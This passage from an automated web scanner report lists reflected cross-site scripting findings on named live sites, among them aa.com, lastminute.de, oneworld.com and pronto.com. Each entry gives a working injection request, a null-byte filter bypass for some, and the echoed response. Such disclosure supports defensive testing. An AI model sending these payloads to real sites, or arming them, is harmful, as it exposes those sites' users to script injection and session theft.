GET /reservation/roundTripSearchAccess.do?anchorEvent=fcddd"><img%20src%3da%20onerror%3dalert(1)>3e7e2603db8&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 191199


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="anchorEvent" value="fcddd"><img src=a onerror=alert(1)>3e7e2603db8" />
...[SNIP]...

1.99. https://www.aa.com/reservation/roundTripSearchAccess.do [anchorLocation parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/roundTripSearchAccess.do

Issue detail

The value of the anchorLocation request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0094275"><img%20src%3da%20onerror%3dalert(1)>94b72a5c254 was submitted in the anchorLocation parameter. This input was echoed as 94275"><img src=a onerror=alert(1)>94b72a5c254 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /reservation/roundTripSearchAccess.do?anchorLocation=Shopping+Links+%28Reservations+Home%29%0094275"><img%20src%3da%20onerror%3dalert(1)>94b72a5c254&url=%2Freservation%2FroundTripSearchAccess.do&_locale=en_US&reportedTitle=Flights HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 191605


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="anchorLocation" value="Shopping Links (Reservations Home).94275"><img src=a onerror=alert(1)>94b72a5c254" />
...[SNIP]...

1.100. https://www.aa.com/reservation/roundTripSearchAccess.do [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/roundTripSearchAccess.do

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5985"><img%20src%3da%20onerror%3dalert(1)>8c370d56eff was submitted in the from parameter. This input was echoed as c5985"><img src=a onerror=alert(1)>8c370d56eff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /reservation/roundTripSearchAccess.do?anchorEvent=false&from=Navc5985"><img%20src%3da%20onerror%3dalert(1)>8c370d56eff HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 191194


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="from" value="Navc5985"><img src=a onerror=alert(1)>8c370d56eff" />
...[SNIP]...

1.101. https://www.aa.com/reservation/roundTripSearchAccess.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/roundTripSearchAccess.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006d5c6"><x%20style%3dx%3aexpr/**/ession(alert(1))>2cfcc62f0b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6d5c6"><x style=x:expr/**/ession(alert(1))>2cfcc62f0b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /reservation/roundTripSearchAccess.do?%006d5c6"><x%20style%3dx%3aexpr/**/ession(alert(1))>2cfcc62f0b9=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 191143


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name=".6d5c6"><x style=x:expr/**/ession(alert(1))>2cfcc62f0b9" value="1" />
...[SNIP]...

1.102. https://www.aa.com/reservation/roundTripSearchAccess.do [promoCode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/roundTripSearchAccess.do

Issue detail

The value of the promoCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3da7e"><x%20style%3dx%3aexpression(alert(1))>ec09264a494 was submitted in the promoCode parameter. This input was echoed as 3da7e"><x style=x:expression(alert(1))>ec09264a494 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /reservation/roundTripSearchAccess.do?promoCode=3da7e"><x%20style%3dx%3aexpression(alert(1))>ec09264a494 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 191335


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="promoCode" value="3da7e"><x style=x:expression(alert(1))>ec09264a494" />
...[SNIP]...

1.103. https://www.aa.com/reservation/roundTripSearchAccess.do [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/roundTripSearchAccess.do

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f4af"><img%20src%3da%20onerror%3dalert(1)>5f6ad6b07bf was submitted in the url parameter. This input was echoed as 7f4af"><img src=a onerror=alert(1)>5f6ad6b07bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /reservation/roundTripSearchAccess.do?anchorLocation=Shopping+Links+%28Reservations+Home%29&url=%2Freservation%2FroundTripSearchAccess.do7f4af"><img%20src%3da%20onerror%3dalert(1)>5f6ad6b07bf&_locale=en_US&reportedTitle=Flights HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 191549


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="url" value="/reservation/roundTripSearchAccess.do7f4af"><img src=a onerror=alert(1)>5f6ad6b07bf" />
...[SNIP]...

1.104. https://www.aa.com/reservation/searchFlightsSubmit.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/searchFlightsSubmit.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b18b5"><img%20src%3da%20onerror%3dalert(1)>e27521e3318 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b18b5"><img src=a onerror=alert(1)>e27521e3318 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /reservation/searchFlightsSubmit.do?b18b5"><img%20src%3da%20onerror%3dalert(1)>e27521e3318=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 191383


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="b18b5"><img src=a onerror=alert(1)>e27521e3318" value="1" />
...[SNIP]...

1.105. https://www.aa.com/seatmap/viewSeatsAccess.do [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /seatmap/viewSeatsAccess.do

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b91f"><img%20src%3da%20onerror%3dalert(1)>c9e6f8211c was submitted in the from parameter. This input was echoed as 7b91f"><img src=a onerror=alert(1)>c9e6f8211c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /seatmap/viewSeatsAccess.do?from=Nav7b91f"><img%20src%3da%20onerror%3dalert(1)>c9e6f8211c HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116340


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="from" value="Nav7b91f"><img src=a onerror=alert(1)>c9e6f8211c" />
...[SNIP]...

1.106. https://www.aa.com/seatmap/viewSeatsAccess.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /seatmap/viewSeatsAccess.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a437a"><img%20src%3da%20onerror%3dalert(1)>02f54b75a31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a437a"><img src=a onerror=alert(1)>02f54b75a31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /seatmap/viewSeatsAccess.do?a437a"><img%20src%3da%20onerror%3dalert(1)>02f54b75a31=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116335


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="a437a"><img src=a onerror=alert(1)>02f54b75a31" value="1" />
...[SNIP]...

1.107. https://www.aa.com/utilities/BookCar.jsp [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /utilities/BookCar.jsp

Issue detail

The value of the src request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 138de'%3balert(1)//29072404f0e was submitted in the src parameter. This input was echoed as 138de';alert(1)//29072404f0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /utilities/BookCar.jsp?src=AATABCAR138de'%3balert(1)//29072404f0e&anchorLocation=Shopping+Links+%28Reservations+Home%29&url=%2Futilities%2FBookCar.jsp&_locale=en_US&reportedTitle=Car HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:32 GMT
Content-Length: 728
Connection: close


<html>
   <body>
   </body>
</html>

<script>
submitCarForm('http://ach1.aavacations.com/car/redircar.asp?src=AATABCAR138de';alert(1)//29072404f0e','');
function submitCarForm(url,aadvNumber) {
carForm = document.getElementById('carForm');
   if (carForm) {
       document.body.removeChild(carForm);
   }
   carForm = document.createElement("form");    
   docum
...[SNIP]...

1.108. http://www.igougo.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20cf4"style%3d"x%3aexpression(alert(1))"434f099edb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 20cf4"style="x:expression(alert(1))"434f099edb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?20cf4"style%3d"x%3aexpression(alert(1))"434f099edb9=1 HTTP/1.1
Host: www.igougo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-SL-CompState: Recompiling
Set-Cookie: ASP.NET_SessionId=ccardw55zfvot555qy3kc320; path=/; HttpOnly
Set-Cookie: UUIDCookie=133422248f294fccb724dc811804a4a3; expires=Mon, 12-Nov-2012 00:01:18 GMT; path=/; HttpOnly
Set-Cookie: SL_Audience=707|Accelerated|772|12|0;Expires=Tue, 12-Nov-13 13:48:25 GMT;Path=/;Domain=.igougo.com
Set-Cookie: SL_UVId=2BE3057CA640E94E;path=/;
Set-Cookie: SL_NV12=1|12;Expires=Tue, 15-Nov-11 01:48:25 GMT;Path=/;Domain=.igougo.com
Cache-Control: private
Date: Sun, 13 Nov 2011 13:50:58 GMT
Connection: close
X-Strangeloop: ViewState
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Content-Length: 201059


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"><script id="slheadjs" type="text/javascript" err="true">
...[SNIP]...
<base href="http://www.igougo.com/Default.aspx?20cf4"style="x:expression(alert(1))"434f099edb9=1" />
...[SNIP]...

1.109. http://www.lastminute.de/de_DE/lmn2/travel/kombi/fh/new.do [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.lastminute.de
Path:   /de_DE/lmn2/travel/kombi/fh/new.do

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 26f8a-->d32a6401dae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /de_DE26f8a-->d32a6401dae/lmn2/travel/kombi/fh/new.do HTTP/1.1
Host: www.lastminute.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 13:48:41 GMT
Server: Apache/2.2
Set-Cookie: JSESSIONID=D34A6F8E292B5D6D423A284B6F2233A6; Path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 42309


<script language="JavaScript" type="text/javascript">
var pageLoadStart = new Date().getTime();
</script>


<!-- START ID :: page -->
<div id="page" class="page">

<div id="heade
...[SNIP]...
<!-- /de_DE26f8a-->d32a6401dae/lmn2/travel/kombi/fh/htmlmodule0.xml -->
...[SNIP]...

1.110. http://www.lastminute.de/de_DE/lmn2/travel/kombi/fh/new.do [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.lastminute.de
Path:   /de_DE/lmn2/travel/kombi/fh/new.do

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload ac692-->96adbea124a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /de_DE/lmn2/travelac692-->96adbea124a/kombi/fh/new.do HTTP/1.1
Host: www.lastminute.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 13:48:55 GMT
Server: Apache/2.2
Set-Cookie: JSESSIONID=4FAD60E7D27AB04B536ED46CE6A2022D; Path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45065


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>lastminute.de
...[SNIP]...
<!-- /de_DE/lmn2/travelac692-->96adbea124a/kombi/fh/htmlmodule4.xml -->
...[SNIP]...

1.111. http://www.lastminute.de/de_DE/lmn2/travel/kombi/fh/new.do [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.lastminute.de
Path:   /de_DE/lmn2/travel/kombi/fh/new.do

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload d8bf7-->b3102df32bf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /de_DE/lmn2/travel/kombid8bf7-->b3102df32bf/fh/new.do HTTP/1.1
Host: www.lastminute.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 13:49:03 GMT
Server: Apache/2.2
Set-Cookie: JSESSIONID=4489FFF2F7B16670F250D6BE303426F5; Path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 47449


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>lastminute.de
...[SNIP]...
<!-- /de_DE/lmn2/travel/kombid8bf7-->b3102df32bf/fh/htmlmodule4.xml -->
...[SNIP]...

1.112. http://www.lastminute.de/de_DE/lmn2/travel/kombi/fh/new.do [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.lastminute.de
Path:   /de_DE/lmn2/travel/kombi/fh/new.do

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 7fbc5-->82dff0268fc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /de_DE/lmn2/travel/kombi/fh7fbc5-->82dff0268fc/new.do HTTP/1.1
Host: www.lastminute.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 13:49:18 GMT
Server: Apache/2.2
Set-Cookie: JSESSIONID=E887CCDC3863FA0E275BE6B689BED985; Path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 52848


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Flug und Hot
...[SNIP]...
<!-- /de_DE/lmn2/travel/kombi/fh7fbc5-->82dff0268fc/htmlmodule4.xml -->
...[SNIP]...

1.113. http://www.oneworld.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oneworld.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c44f"><script>alert(1)</script>c6d9a582c96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?1c44f"><script>alert(1)</script>c6d9a582c96=1 HTTP/1.1
Host: www.oneworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 13 Nov 2011 13:48:56 GMT
Server: Microsoft-IIS/6.0
ow: web1
X-Powered-By: ASP.NET
Set-Cookie: JSESSIONID=3630f9fbd90e7feb486b4265f686d3e53155;domain=.oneworld.com;path=/
expires: -1
Content-Type: text/html; charset=utf-8
cache-control: no-cache
cache-control: no-cache, must-revalidate
pragma: no-cache
Last-Modified: Sun, 13 Nov 2011 13:48:56 GMT
Content-Language: en-AU

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a mpdisnav mporgnav href="http://www.oneworld.com/?1c44f"><script>alert(1)</script>c6d9a582c96=1&languageCode=en" onclick="return SwitchLanguage('en'); function SwitchLanguage(lang) {
MP.SrcUrl=unescape('mp_js_orgin_url');
   MP.UrlLang='mp_js_current_lang';
   MP.init();
   MP.switchLanguage
...[SNIP]...

1.114. http://www.pronto.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pronto.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload edeff'><script>alert(1)</script>02e3f611d22 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?edeff'><script>alert(1)</script>02e3f611d22=1 HTTP/1.1
Host: www.pronto.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 13:48:37 GMT
Server: Apache/2.2.4 (Fedora)
Set-Cookie: JSESSIONID=7442D988491ECF2828BB20639A3017F0; Path=/
Set-Cookie: SESSIONID=-1212152019; Domain=.pronto.com; Path=/
Set-Cookie: abt=ProntoV3_7_4-1.262-cellNum_2; Domain=.pronto.com; Expires=Tue, 13-Dec-2011 13:48:37 GMT; Path=/
Set-Cookie: entryPoint=direct; Domain=.pronto.com; Path=/
Set-Cookie: M_ID=5ad6b0bc-1339d24b9ca--20e9; Domain=.pronto.com; Expires=Tue, 12-Nov-2013 13:48:37 GMT; Path=/
Set-Cookie: V_ID=5ad6b0bc-1339d24b9ca--20e8; Domain=.pronto.com; Path=/
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
_eep-Alive: timeout=15
_onnection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Via: CN-5000
Connection: close
Content-Length: 116237


            <!DOCTYPE html
PUBLIC "-//W3C//DTD
...[SNIP]...
<meta content='http://www.pronto.com/?edeff'><script>alert(1)</script>02e3f611d22=1' property='og:url'/>
...[SNIP]...

1.115. http://www.reisefeber.no/no/package_tours [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reisefeber.no
Path:   /no/package_tours

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e9b1"><script>alert(1)</script>01edd94456d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /no8e9b1"><script>alert(1)</script>01edd94456d/package_tours HTTP/1.1
Host: www.reisefeber.no
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 13:49:24 GMT
Server: tn3 Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27017

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- template = error/page_has_expired.html -->
<html>
<head>
<title>Reisefeber - Gode reisetilbud er ferskvare</title>
<META http-e
...[SNIP]...
<input type="hidden" name="last_name" value="/no8e9b1"><script>alert(1)</script>01edd94456d/package_tours">
...[SNIP]...

1.116. http://www.reisefeber.no/no/package_tours [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reisefeber.no
Path:   /no/package_tours

Issue detail

